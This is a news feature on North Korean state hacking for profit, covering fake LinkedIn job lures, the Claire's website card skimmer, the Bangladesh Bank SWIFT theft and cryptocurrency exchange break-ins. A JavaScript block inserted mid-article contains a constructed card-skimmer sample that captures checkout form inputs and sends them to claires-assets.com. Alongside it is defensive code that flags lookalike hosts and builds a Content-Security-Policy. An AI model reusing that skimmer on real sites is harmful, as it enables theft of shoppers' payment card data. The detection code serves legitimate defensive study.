North Korea keeps coffers stacked from hacks
Everything from fashion sales to the Fed has become a target for North Korean cyber thieves, discovers James Cook
At the end of 2019, a series of apparently innocuous messages were sent through LinkedIn to employees of aerospace and military companies in the UK, Europe and the Middle East. “We welcome elites like you,” said one message which seemed to have been sent by a recruiter working for a rival business. “I want you to work in our company.”
Curious engineers who replied to the job offers were sent further messages urging them to download files to find out more. “As you are a reliable elite, I will recommend you to our very important department,” they were promised before being encouraged to open files containing a list of open jobs and salaries.
But while recipients read through the list of highly paid positions, their computers were being silently hijacked by hackers who implanted software to allow them to peer through all their files and emails.
The jobs and the recruiters weren’t real, but part of an elaborate scam.
The messages were sent by Lazarus, a notorious North Korean hacking group which managed to break into the servers of Sony Pictures in 2014, and brought parts of the NHS to a standstill during the WannaCry ransomware attack in 2017, say experts from cybersecurity businesses ESET and F-Secure.
Once the hackers had gained access to a target’s computer, the fake LinkedIn profiles vanished. One hacker then used his access to a victim’s email account to find an outstanding invoice. He sent an email to another business demanding payment, but asked for the money to be sent to a new bank account controlled by the hacking group.
This cyberattack is a typical example of North Korea’s unique approach to hacking. As well as hacking to make political statements, the country uses its legions of hackers to generate billions of dollars for the regime through a series of audacious cyber bank heists.
A United Nations report published last year estimated that North Korean hackers have stolen more than $2bn (£1.5bn) and said the money was being funnelled into the regime’s missile development programmes.
Cut off from almost all of the world’s financial system, North Korea has for years relied on illegal activities to bolster its income. As well as thriving drug trafficking and counterfeiting schemes, the regime has also carried out hundreds of digital bank heists. Spy agencies around the world typically consider Chinese and Russian hackers to be their largest problem, with North Korea and Iran seen as more amateur. Ed Parsons, the managing director of F-Secure Consulting, who has been tracking recent North Korean attacks against the UK, says the country’s hackers are “opportunistic”.
“They’re quite brazen, they’re more indiscriminate and prolific compared to other threat actors,” he says.
The constant stream of cyber attacks from North Korea hasn’t slowed during the coronavirus pandemic.
Claire’s, the fashion accessories chain, announced on March 20 that it would close all of its shops during lockdown. Within hours, a North Korean hacker had purchased the web domain claires-assets.com.
Four weeks later, cybersecurity business Sansec spotted that hackers had managed to sneak a snippet of malicious code on to the main Claire’s website which silently intercepted the card details of people shopping online from their homes for weeks until it was removed on June 13.
The stolen card numbers were smuggled out to claires-assets.com, an innocent-looking web domain which was unlikely to raise alarm bells at Claire’s.
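The skimmer described above has a recognisable shape: a few lines of JavaScript hook the checkout form and beacon the field values to a host that looks like the brand but is not owned by it. The example below is added here and is not code from Claire’s site or from Sansec’s report; the skimmer snippet is constructed for illustration, and the allowlist of first-party hosts and the brand token are assumptions. It shows a simple audit that pulls every host referenced by a page script, flags any host outside the allowlist, marks hosts that reuse the brand name as lookalikes, and builds the Content-Security-Policy that would have stopped the beacon to claires-assets.com from leaving the browser.

```javascript
// Added example (not from the original article). A minimal audit for
// Magecart-style card skimmers: find exfiltration hosts in page scripts and
// flag any host the site does not own, with lookalike domains called out.

// CONSTRUCTED skimmer sample in the style described above; not the real code.
// It serialises every input on submit and beacons it out via an image request.
const SKIMMER_SAMPLE = `
document.querySelector('form#checkout').addEventListener('submit', function () {
  var d = {};
  document.querySelectorAll('input').forEach(function (i) { d[i.name] = i.value; });
  new Image().src = 'https://claires-assets.com/c.php?d=' + btoa(JSON.stringify(d));
});
`;

// Assumed allowlist of first-party hosts and the brand token a lookalike would reuse.
const ALLOWED_HOSTS = new Set(['claires.com', 'www.claires.com']);
const BRAND_TOKENS = ['claires'];

// Collect the host of every http(s) URL literal in the script text.
function extractHosts(scriptText) {
  const re = /https?:\/\/([a-z0-9.-]+)/gi;
  const hosts = new Set();
  let m;
  while ((m = re.exec(scriptText)) !== null) {
    hosts.add(m[1].toLowerCase());
  }
  return [...hosts];
}

// A lookalike host embeds the brand name (claires-assets.com, claires-cdn.net, ...)
// but is not on the allowlist. Punctuation is stripped so "claires-" still matches.
function isLookalike(host) {
  const flat = host.replace(/[^a-z0-9]/g, '');
  return BRAND_TOKENS.some((t) => flat.includes(t));
}

// Return one finding per non-allowlisted host. readsForms notes whether the
// same script also touches form inputs, the usual sign of a skimmer rather
// than an innocent third-party tag.
function auditScript(scriptText, allowed = ALLOWED_HOSTS) {
  const findings = [];
  for (const host of extractHosts(scriptText)) {
    if (allowed.has(host)) continue;
    findings.push({
      host,
      lookalike: isLookalike(host),
      readsForms: /\b(input|form)\b/i.test(scriptText),
    });
  }
  return findings;
}

// Build a CSP that confines scripts, fetches, image loads and form posts to
// the allowlist. An Image() beacon to an unlisted host is blocked by img-src.
function cspFor(allowed = ALLOWED_HOSTS) {
  const srcs = ["'self'", ...[...allowed].map((h) => 'https://' + h)].join(' ');
  return `default-src 'self'; script-src ${srcs}; connect-src ${srcs}; img-src ${srcs}; form-action ${srcs}`;
}

// Stand-alone run: audit the constructed sample and print the policy.
for (const f of auditScript(SKIMMER_SAMPLE)) {
  console.log(`suspect host ${f.host} lookalike=${f.lookalike} readsForms=${f.readsForms}`);
}
console.log(cspFor());
```

In practice the audit runs over the scripts actually served to a real checkout page (or over the page’s own CSP violation reports), and the allowlist is the set of hosts the site knowingly loads from; anything else, lookalike or not, is worth a look.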
“North Korea seems to be acting like a cyber crime group,” says Kayla Izenman, a researcher at the Royal United Services Institute. “They are extremely successful.”
These recent hacks, however, are small fry in scale compared to North Korea’s most audacious cyber heist.
In 2016, its hackers used the SWIFT credentials of employees of Bangladesh’s central bank to send a series of transfer requests to the Federal Reserve Bank of New York.
They made off with $81m from the central bank’s accounts, but missed out on their attempted haul of $1bn when Deutsche Bank and the Fed raised the alarm.
Deutsche Bank only looked into the transactions when it spotted a misspelled word in one of the payment requests. A fictional Sri Lankan non-profit organisation was called a “fandation” rather than “foundation”. The blunder stopped the hackers from stealing $851m more.
In recent years, the North Korean regime’s attention has turned to the softer target of cryptocurrency. North Korean hackers have broken into countless cryptocurrency exchanges and stolen hundreds of millions of dollars of virtual currencies.
“Any numbers that you see in terms of scope or scale of how much cryptocurrency that they’re holding, you probably need to double it,” Izenman says.
In late 2018, North Korean hackers posed as potential clients of a cryptocurrency exchange, and began emailing its employees. When the exchange asked them to send photographs of themselves holding identifying documents, they simply forged the images using Photoshop to mask their true identities.
Some of their emails were laced with malware that gave the hackers access to the company’s servers. Once inside the network, the hackers stole $234m worth of digital currencies such as Bitcoin and Dogecoin, according to a US government indictment.
Cryptocurrencies may move outside the world’s traditional banking networks, but law enforcement agencies around the world have found ways to track their movement.
That causes a problem for North Korean hackers seeking ways to hide their transfer of funds, so they often use elaborate schemes to hide the movement of the digital money, such as transferring virtual coins more than 5,000 times in an attempt to throw investigators off their scent.
Security experts warn that a long-standing impression that North Korean hackers typically carry out the digital equivalent of smash and grab raids, breaking into networks and stealing as much money as possible before fleeing, is no longer correct.
Instead, they are becoming more sophisticated, and taking care to hamper any efforts to track their movements inside companies.
“We have had clear evidence of really concerted efforts by North Korean attackers to hide their tracks,” Parsons says.
Instead of grabbing the digital cash and fleeing, they’re now securely deleting any evidence that they were ever inside networks before making away with the proceeds.
That’s a concern for security experts who spend their lives trying to safeguard networks against the hackers. There is no sign of North Korean hackers slowing down their virtual bank heists during the pandemic, and it seems they’re only getting smarter.
Spy gains: hacking is hugely lucrative for the regime